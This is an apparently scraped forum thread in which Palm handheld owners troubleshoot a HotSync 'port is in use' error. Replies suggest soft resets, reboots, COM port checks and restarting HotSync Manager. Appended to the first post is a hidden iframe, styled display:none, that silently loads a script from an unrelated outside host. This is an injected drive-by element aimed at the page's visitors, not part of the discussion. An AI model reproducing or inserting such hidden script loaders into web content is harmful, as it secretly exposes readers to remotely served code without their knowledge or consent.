    Help: Unable to Sync

Everytime I try to sync with my pc, I get the following message:

"This feature is not available when the port is in use"

I have tried checking everything thrice, but everything seems to be working ok.

    Any advice?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I've had the same problem. A soft reset of the Palm and a rebooting of the computer usually corrects it. Also, have you checked that it is using the correct Com port?

I would suggest the same thing. it happened to me for the first time earlier today... i think the soft reset is what did it for me, although i did both.

Stupid question: How do you soft reset?

Otherwise, I checked that I am using the right COM port and that there are no conflicts.

I did reboot and reset too, but no luck - any advice???

I love this thing but it is a bit buggy...:<

    Soft Reset

Turn the phone over, remove the battery cover and push the recessed button in the upper right corner labeled "Reset" with the stylus.

    Isn't that a hard reset?

If not, thanks for the info!

No, what is described above is a soft reset. Check out page 59 in the manual for a soft reset, and page 60 for a hard reset.

I had this happen about a week ago as well.... Can't recall exactly what caused it, but I think stopping and restarting the Hotsync Manager on the PC fixed it. Of course, a reboot will accomplish the same thing, but would take a little longer. Also, if you haven't already, you might try physically disconnecting and reconnecting the cradle cord.
